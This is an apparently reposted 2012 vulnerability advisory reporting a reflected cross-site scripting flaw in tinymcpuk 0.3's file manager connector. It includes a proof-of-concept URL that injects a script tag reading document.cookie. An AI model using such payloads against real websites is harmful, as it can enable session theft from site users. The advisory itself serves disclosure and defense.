Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:28831
HistoryDec 10, 2012 - 12:00 a.m.

tinymcpuk xss vulnerability

2012-12-1000:00:00
vulners.com
23

=================================================================
tinymcpuk xss vulnerability

Exploit Title: tinymcpuk xss vulnerability

Google Dork: n/a

Date: 1/12/2012 (GMT+7)

Exploit Author: eidelweiss (@randyarios)

Vendor Homepage: http://sourceforge.net/projects/p4a/files/tinymcpuk/

Software Link: http://sourceforge.net/projects/p4a/files/tinymcpuk/0.3/

Version: 0.3

Tested on: windows & Ubuntu Linux

[!] about

TinyMCPUK - TinyMCE with file/image manager.
TinyMCPUK brings you the powerful TinyMCE plus
the MCPUK file manager and ImageManager
strictly integrated together.

[!] exploit & p0c

/tinymcpuk/filemanager/connectors/php/connector.php?test=<h1>p0c</h1>&xss=<script>alert(document.cookie)</script>

[!] sample poc

http://host/filemanager/connectors/php/connector.php?test=&lt;h1&gt;p0c&lt;/h1&gt;&amp;xss=&lt;script&gt;alert&#40;document.cookie&#41;&lt;/script&gt;

==========================| -=[ E0F ]=- |==========================

Nb: Graatz to om wenk and all DC member… sorry om Suntuk banget gue wkakwakwkawk… bavod!!!